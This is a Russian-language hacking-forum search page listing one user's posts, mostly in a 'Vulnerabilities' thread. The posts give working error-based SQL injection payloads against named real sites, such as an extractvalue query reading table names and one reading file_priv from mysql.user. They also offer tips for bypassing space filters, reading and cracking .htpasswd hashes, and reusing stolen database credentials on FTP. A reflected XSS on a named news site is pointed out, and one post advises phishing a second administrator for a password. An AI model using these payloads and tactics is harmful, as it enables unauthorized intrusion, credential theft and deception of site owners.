 |
 |
 | |
 | |
| |
 |
 |
FORUMS | |
MEMBERS | |
RECENT POSTS |  |
LOG IN |
|
||||||
|
Показано с 1 по 25 из 500.
На поиск затрачено 0.09 сек. Поиск: Сообщения от: Konqi |
Раздел: Уязвимости
29.08.2016, 18:57
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
вместо пробелов можно юзать одно из этих.
...вместо пробелов можно юзать одно из этих. /**/, %0d, %0a, %0c, %09 вариантов куча. |
|
Раздел: Уязвимости
29.08.2016, 18:22
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
нет, обычно хранится в файле .htpasswd (если там...нет, обычно хранится в файле .htpasswd (если там апач). если есть права на чтение файлов (file_priv=y) в MySQL то попробуй прочитать .htpasswd и расшифровать хэш. Там обычно хэш в формате md5(APR)... |
|
Раздел: Уязвимости
29.08.2016, 18:18
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
не от самой админки, а от бейсик авторизации....не от самой админки, а от бейсик авторизации. юзай СИ. http://site.ru/info/1'or extractvalue(1,concat(0x3a,(select table_name from information_schema.tables limit 0,1)))='1 |
|
Раздел: Уязвимости
29.08.2016, 17:30
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
засоциалить другого админа. мы так похекали булку...засоциалить другого админа. мы так похекали булку пару лет назад. было весело) напиши другому админу в пм, мол пароль что то не подходит, может он сменил ее и забыл предупредить. |
|
Раздел: Уязвимости
08.02.2016, 01:51
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
|
|
Раздел: Уязвимости
07.02.2016, 02:35
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
Директива "DOCUMENT_ROOT", показывает корневой...Директива "DOCUMENT_ROOT", показывает корневой каталог сайта. |
|
Раздел: Песочница
19.01.2016, 21:51
|
|
Ответов: 19
Просмотров: 2,336
Автор
Konqi
|
|
Раздел: Уязвимости
12.01.2016, 22:17
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
'or(extractvalue(1,concat(0x3a,(select(file_priv)f...'or(extractvalue(1,concat(0x3a,(select(file_priv)from(mysql.user)where(user='BabaDook')limit+0,1))))and' |
|
Раздел: Уязвимости
03.01.2016, 20:04
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
|
|
Раздел: Уязвимости
03.01.2016, 19:10
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
что именно заюзать? вы видите там уязвимость?
...что именно заюзать? вы видите там уязвимость? по соседству есть Reflected XSS http://www.maltatoday.com.mt/ui_frontend/ |
|
Раздел: Уязвимости
03.01.2016, 18:10
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
|
|
Раздел: Уязвимости
13.11.2015, 00:32
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
|
|
Раздел: Уязвимости
07.11.2015, 10:47
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
Какие то странные вопросы озвучиваете. Если ваша...Какие то странные вопросы озвучиваете. Если ваша иньекция дает возможность выполнения UPDATE запросов то можно изменить все что хотите (а точнее то к чему есть доступ). //но кэп подсказывает что с... |
|
Раздел: Уязвимости
03.11.2015, 15:45
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
|
|
Раздел: Уязвимости
03.11.2015, 15:39
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
да, код не обрабатываеться интерпретатором. Если...да, код не обрабатываеться интерпретатором. Если программист сильно не перестарался то ничего не выйдет. |
|
Раздел: Уязвимости
03.11.2015, 15:27
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
[QUOTE="GroM88"]
↑...[QUOTE="GroM88"] ↑ (https://antichat.live/posts/3910483/) Ребята, так понимаю там стоит какой то чудо фильтр на phpinfo(); но что то сомневаюсь что сработает в твоем случай. почти уверен что... |
|
Раздел: Уязвимости
27.10.2015, 16:40
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
там тоже работает, если передать массив вместо...там тоже работает, если передать массив вместо строки. 2 all. перестаньте постить нераскрученные скули и отчеты ваших сканеров. старайтесь все делать сами, а если что то и не выходит то опишите... |
|
Раздел: Уязвимости
26.10.2015, 09:40
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
|
|
Раздел: Уязвимости
26.10.2015, 08:38
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
http://stop-obman.ru/websites.html?...r(extractval...http://stop-obman.ru/websites.html?...r(extractvalue(1,concat(0x3a,version())))=('1... |
|
Раздел: Уязвимости
02.10.2015, 17:59
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
ищи интерфейс для подключения к БД (PMA, Adminer,...ищи интерфейс для подключения к БД (PMA, Adminer, etc), или попробуй подключиться удаленно. так же пробуй эти данные к другим сервисам, например FTP (бывает что совпадают) |
|
Раздел: Уязвимости
25.09.2015, 20:18
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
ну перехвати один из запросов, потом повторно...ну перехвати один из запросов, потом повторно отправляй его меняя куки попробуй нулл-байтом отрезать .php, или же юзать багу со слеш-дотами. ничего нового. |
|
Раздел: Уязвимости
25.09.2015, 19:09
|
|
Ответов: 2,955
Просмотров: 999,013
Автор
Konqi
не очень удобно раскручивать скулю в куках через...не очень удобно раскручивать скулю в куках через браузер. поставь burp suite, или charles. а так можно через Live http headers для ФФ |
|
Раздел: Песочница
04.05.2015, 00:39
|
|
Ответов: 18
Просмотров: 5,043
Автор
Konqi
ищи phpmyadmin, или попробуй подключение из вне,...ищи phpmyadmin, или попробуй подключение из вне, вдруг прокатит. скачай ArxScanSite и поищи PMA на сайте |
|
Раздел: Криптография, расшифровка хешей
03.05.2015, 02:16
|
|
Ответов: 186
Просмотров: 235
Автор
Konqi
|
|
Раздел: Мировые новости. Обсуждения.
26.04.2015, 04:32
|
|
Ответов: 6
Просмотров: 2,194
Автор
Konqi
|
| Показано с 1 по 25 из 500. |
